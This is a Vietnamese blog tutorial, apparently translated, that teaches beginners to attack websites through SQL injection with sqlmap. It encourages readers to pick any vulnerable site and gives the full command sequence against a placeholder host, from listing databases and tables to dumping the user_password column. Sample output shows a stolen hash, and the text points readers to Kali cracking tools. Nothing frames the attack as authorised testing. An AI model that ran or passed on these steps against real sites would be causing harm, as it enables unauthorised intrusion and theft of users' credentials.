Sử dụng SQLmap cho tấn công SQL Injection

sqlmap

SQL map là một công cụ hữu ích cho begginer tham gia thử tấn công các web .Sau đây mình xin chia sẽ cách sử dụng công cụ này .

Trước hết các bạn chuẩn bị cho mình một link web nào đó có lỗi SQL injection.

Chạy lệnh cmd

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

Ở đây:
sqlmap = Tên của tệp nhị phân sqlmap
-u = URL mục tiêu (ví dụ: “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Liệt kê cơ sở dữ liệu DBMS

sá»­ dụng-sqlmap-sql-injection-to-hack-a-trang web-và-cÆ¡ sở dữ liệu-blackmore-ops-2 Sử dụng SQLmap cho tấn công SQL Injection

Lệnh này cho thấy một vài thông tin thú vị:

công nghệ ứng dụng web: Apache
DBMS back-end: MySQL 5.0
[10:55:53] [INFO] đã truy xuất: information_schema
[10:55:56] [INFO] được truy xuất: sqldummywebsite
[10:55:56] [INFO] đã tìm nạp dữ liệu được ghi vào tệp văn bản trong 
                  '/usr/share/sqlmap/output/www.sqldummywebsite.com'

 

Bây giờ chúng ta có hai cơ sở dữ liệu mà chúng ta có thể xem xét. information_schema là một cơ sở dữ liệu tiêu chuẩn cho hầu hết mọi cơ sở dữ liệu MYSQL. Vì vậy, sự quan tâm của chúng ta sẽ là trên cơ sở dữ liệu sqldummywebsite.

Liệt kê các bảng cơ sở dữ liệu đích bằng cách sử dụng SQLMAP SQL Injection

Bây giờ chúng ta cần biết có bao nhiêu bảng mà cơ sở dữ liệu sqldummywebsite này nhận được và tên của chúng là gì. Để tìm hiểu thông tin đó, sử dụng lệnh sau:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D 
sqldummywebsite --tables

Thông tin được cơ sở dữ liệu này có 8 bảng.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

 

use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3 Sử dụng SQLmap cho tấn công SQL Injection

 Liệt kê các cột trên bảng đích của cơ sở dữ liệu đã chọn bằng cách sử dụng SQLMAP SQL Injection

Bây giờ chúng ta cần liệt kê tất cả các cột trên bảng mục tiêu user_info của cơ sở dữ liệu sqldummywebsite bằng cách sử dụng SQLMAP SQL Injection. SQLMAP SQL Injection làm cho nó thực sự dễ dàng, chạy lệnh sau:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D 
sqldummywebsite -T user_info --columns

 

Điều này trả về 5 mục từ bảng mục tiêu user_info của cơ sở dữ liệu sqldummywebsite.

[10:57:16] [INFO] tìm nạp các cột cho bảng 'user_info' trong cơ sở dữ liệu 
                  'sqldummywebsite' 
[10:57:18] [INFO] heuristics đã phát hiện bộ ký tự trang web 'ISO-8859-2' 
[10:57:18 ] [INFO] truy vấn SQL được sử dụng trả về 5 mục 
[10:57:20] [INFO] được truy xuất: user_id 
[10:57:22] [INFO] đã truy xuất: int (10) unsigned 
[10:57:25] [INFO ] được truy xuất: user_login 
[10:57:27] [INFO] được truy xuất: varchar (45) 
[10:57:32] [INFO] được truy xuất: user_password 
[10:57:34] [INFO] được truy xuất: varchar (255) 
[ 10:57:37] [INFO] được truy xuất: unique_id 
[10:57:39] [INFO] được truy xuất: varchar (255) 
[10:57:41] [INFO] được truy xuất: record_status 
[10:57:43] [INFO ] được truy xuất: tinyint (4)

Đây chính xác là những gì chúng ta đang tìm kiếm … mục tiêu user_login và user_password.

sá»­ dụng-sqlmap-sql-injection-to-hack-a-trang web-và-cÆ¡ sở dữ liệu-blackmore-ops-4 Sử dụng SQLmap cho tấn công SQL Injection

Trích xuất mật khẩu từ các cột mục tiêu của bảng đích của cơ sở dữ liệu được chọn bằng cách sử dụng SQLMAP SQL Injection

Sử dụng lệnh sau để trích xuất mật khẩu cho người dùng.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D 
sqldummywebsite -T user_info -C user_password --dump

 

Và đây là mật khẩu . Nhưng nó đã được mã hóa . Bạn cần một tool giải mã nó (tool crack pass trên Kali Linux có thêm giúp ích cho bạn) .

[10:59:15] [INFO] truy vấn SQL được sử dụng trả về 1 mục 
[10:59:17] [INFO] được truy xuất: 24iYBc17xK0e. 
[10:59:18] [INFO] phân tích kết xuất bảng cho các băm mật khẩu có thể có 
Cơ sở dữ liệu: sqldummywebsite 
Bảng: user_info 
[1 mục] 
+ --------------- + 
| user_password | 
+ --------------- + 
| 24iYBc17xK0e. | 
+ --------------- +

 

Như vậy chúng ta đã hack được một web database nào đó bằng SQL injection sử dụng công cụ SQL map . Cảm ơn các bạn đã đón xem .

Xem thêm :Sql injection là gì ? Tìm hiểu cách thức tấn công SQL Injection

BÌNH LUẬN

Please enter your comment!
Please enter your name here